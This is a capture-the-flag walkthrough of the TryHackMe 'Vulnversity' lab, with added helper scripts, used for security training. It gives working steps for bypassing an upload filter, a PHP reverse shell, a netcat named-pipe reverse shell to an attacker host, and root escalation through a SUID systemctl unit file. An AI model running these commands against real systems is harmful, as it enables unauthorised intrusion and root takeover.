TRY HACK ME
- TryHackMe: Cyber security training through short, gamified, real-world labs. Content for complete beginners and seasoned hackers.
Vulnversity
Write-Ups: n0w4n
Port/Version Scan
GoBuster (dirs)
Brute-force directories & files, DNS subdomains, and virtual host names.
Install: apt-get install gobuster (wordlists under /usr/share/wordlists)
Syntax: gobuster dir -u http://<ip>:3333 -w <wordlist location>
  -e            Print the full URLs in your console
  -u            The target URL
  -w            Path to your wordlist
  -U and -P     Username and password for Basic Auth
  -p <x>        Proxy to use for requests
  -c <cookies>  Specify a cookie for simulating your auth
n0w4n: Used DirSearch
dirsearch -u http://10.10.207.138:3333 -e php -x 400,404
Burp: Intruder
Burp Suite Intruder: Fuzz the /internal/ directory to see what kinds of file extensions it will allow you to upload.
n0w4n: Load the wordlist and don't forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be file%2ephp, which won't work.
- I did that… and it didn't work.
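The same extension check can be scripted instead of run through Intruder. The script below is an added example, not part of n0w4n's write-up or the Vulnversity room: it uploads a harmless probe file once per candidate extension and prints the extensions the server does not reject. The form field name "file", the rejection text "Extension not allowed" and the default target URL are assumptions; adjust them to what Burp shows for the real form. The filename is sent raw, so the server sees test.php rather than test%2ephp.

```shell
#!/bin/sh
# Added example (not from the write-up): probe an upload form with one
# candidate extension at a time and report which ones are accepted.
# Assumptions: form field is "file", rejections contain the text
# "Extension not allowed", and the form posts to $TARGET.

TARGET="${TARGET:-http://10.10.207.138:3333/internal/}"
EXTS="php php3 php4 php5 phtml phar"

# probe EXT -> prints the server's response body for an upload named test.EXT.
# curl -F sends the filename verbatim (no URL-encoding of the dot).
probe() {
    tmp=$(mktemp)
    printf '<?php echo "probe"; ?>\n' > "$tmp"
    curl -s -F "file=@${tmp};filename=test.$1" "$TARGET"
    rm -f "$tmp"
}

# allowed_exts -> prints every extension whose response lacks the rejection text
allowed_exts() {
    for ext in $EXTS; do
        body=$(probe "$ext")
        case "$body" in
            *"Extension not allowed"*) ;;        # rejected by the upload filter
            *) printf '%s\n' "$ext" ;;           # not rejected: worth trying
        esac
    done
}

# Run against the target:
#   allowed_exts
```

Any extension this prints still has to be confirmed by hand (the server may accept the upload and refuse to execute it), which is why the next step uploads a real shell with the surviving extension.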
Reverse Shell
Obtain a PHP reverse shell to upload: pentestmonkey's php-reverse-shell (set $ip and $port in the script to your attack machine's IP and listener port).
- Rename it to a .phtml extension, since the upload form does not accept .php.
- Upload it.
- Start a listener on your attack machine:
nc -lvnp 1234
  -l  listen
  -v  verbose
  -n  numeric-only IP addresses, no DNS
  -p  local port number
- Then execute the .phtml file by requesting it from the target's uploads directory (the listener catches the shell):
http://[IP]:3333/internal/uploads/ (browse to the file you uploaded)
Privilege Escalation
n0w4n: For a lot of CTFs, files with the SUID bit set are a good find.
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
  -perm /4000  setuid bit set
  -type f      regular files only
  ls -ld       long listing format; list directory names, not contents
  2>/dev/null  discard permission-denied errors
Or use PEASS: Privilege Escalation Awesome Scripts Suite
- LinPEAS: Linux Privilege Escalation Awesome Script (linpeas.sh)
Discovered Vulnerability: systemctl is SUID root
Exploit
n0w4n: He said we did not have permissions to write to the default systemctl directory, so he created the unit file as an ENVIRONMENT VARIABLE.
- First we create a variable that holds the path of a unique temporary file (created with mktemp on the target machine); the .service suffix is required for systemctl to treat it as a unit.
eop=$(mktemp).service
- Then we create a unit file and write it to that path. Inside the unit file we enter a command that makes the shell execute cat and redirect the output of cat to a file called output in the folder /tmp/. Because systemctl is SUID root, the service runs as root, so the copy of /root/root.txt is readable afterwards.
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
- And finally we use the /bin/systemctl program to link and enable the unit file (link needs an absolute path, which mktemp provides):
/bin/systemctl link $eop
# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
/bin/systemctl enable --now $eop
# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
- Find the output file, written by root, and read /tmp/output:
ls -lah /tmp
Alternative Exploit
To get a reverse root shell:
NOTE: the target machine is using the OpenBSD variant of netcat, NOT the traditional netcat. That means the -e (execute) flag will not work: OpenBSD netcat removed -e for security reasons. Use the named-pipe form instead:
# nc (openbsd):
rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
- Create your unit file in /tmp. Replace $HOST and $PORT with your attack machine's IP and listener port before running this: inside single quotes the shell does not expand them, and the service does not inherit your shell's environment.
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
[Install]
WantedBy=multi-user.target' > /tmp/gk.service
- Open a listener on your attack machine:
nc -lvnp 7777
- Link and start the service (with Type=oneshot, enable --now does not return until the reverse shell exits; that is expected):
/bin/systemctl link /tmp/gk.service # need the full path
/bin/systemctl enable --now /tmp/gk.service
Done.
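Both exploits above follow the same pattern: find a SUID binary that can start a process as root, then hand it a unit file. The script below is an added example, not part of n0w4n's write-up or the room: it enumerates SUID binaries under a directory and flags the ones on a short list of binaries known to give code execution as their owner (the list is an assumption kept short for the demo), and it builds the unit file with printf so the quoting does not depend on echo. The usage comment shows it plugging into the link / enable --now steps from the write-up.

```shell
#!/bin/sh
# Added example (not from the write-up): SUID triage plus a unit-file builder
# for the systemctl privilege escalation above.

# Binaries that give code execution as root when SUID root.
# Demo list, not exhaustive (assumption).
DANGEROUS="systemctl bash sh dash python python3 perl find vim env nmap"

# suid_files DIR -> one path per line for every SUID regular file under DIR
suid_files() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# flag_dangerous DIR -> the subset of suid_files whose basename is on DANGEROUS
flag_dangerous() {
    suid_files "$1" | while IFS= read -r path; do
        name=${path##*/}
        for d in $DANGEROUS; do
            if [ "$name" = "$d" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# make_unit CMD -> prints a oneshot unit whose ExecStart runs CMD via /bin/sh -c.
# CMD must not contain a double quote.
make_unit() {
    printf '[Service]\nType=oneshot\nExecStart=/bin/sh -c "%s"\n[Install]\nWantedBy=multi-user.target\n' "$1"
}

# Usage on the target (assumes /bin/systemctl is SUID root, as in the room):
#   flag_dangerous /                      # expect /bin/systemctl in the output
#   unit=$(mktemp).service                # absolute path; systemctl link needs one
#   make_unit 'cat /root/root.txt > /tmp/output' > "$unit"
#   # or, for the reverse shell (fill in the IP and port first):
#   # make_unit 'rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc 10.0.0.1 7777 >/tmp/f' > "$unit"
#   /bin/systemctl link "$unit" && /bin/systemctl enable --now "$unit"
```

The hardening side of the same check is the one LinPEAS runs: no binary on that list should carry the SUID bit, and systemctl in particular never needs it, since authorised users can be granted specific actions through polkit instead.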